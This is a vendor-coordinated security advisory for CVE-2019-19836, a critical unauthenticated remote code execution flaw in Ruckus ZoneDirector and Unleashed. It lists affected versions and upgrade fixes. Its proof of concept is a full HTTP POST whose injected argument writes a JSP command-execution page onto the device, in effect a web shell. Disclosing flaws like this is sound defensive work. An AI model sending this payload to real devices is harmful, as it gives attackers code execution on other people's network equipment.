<--

Remote code execution vulnerability via zap

Aleph Research Advisory

Identifier

CVE-2019-19836

Severity

Critical

Product

  • ZoneDirector
  • Unleashed

Vulnerable Version

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7

Mitigation

  • 9.10.x: Upgrade to 9.10.2.0.84
  • 9.12.x: Upgrade to 9.12.3.0.136
  • 9.13.x: Upgrade to 10.0.1.0.90
  • 10.0.x: Upgrade to 10.0.1.0.90
  • 10.1.x: Upgrade to 10.1.2.0.275
  • 10.2.x: Upgrade to 10.2.1.0.147
  • 10.3.x: Upgrade to 10.3.1.0.21
  • 200.6 and before: Upgrade to 200.7.10.202.94
  • 200.7: Upgrade to 200.7.10.202.94

Technical Details

Remote code execution vulnerability in zap caused by insufficient input validation.

zap executable is reachable without authentication. Due to insufficient input validation, unintended arguments can be used to write a page which is vulnerable to one of the following command injection vulnerabilities:

Proof Of Concept

SSRF POST request example

POST /tools/_rcmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
Content-Length: 310

<ajax-request action='docmd' xcmd='wc' updater='system.1568118269965.3208' comp='zapd'>
        <xcmd cmd='wc' comp='zapd' wcid=1 client='192.168.0.1' tool='zap-up' zap-type='udp' server='{tx_station} -R -L/web/uploaded/index.jsp -T<%Delegate("AjaxCmdStat" -Ssession["cid"]);%>' syspmtu=65500 />
</ajax-request>

Timeline

Posts

Credit

External References

  1. Ruckus Networks - Security Advisory ID 20191224 - txt
  2. Ruckus Networks - Security Advisory ID 20191224 - PDF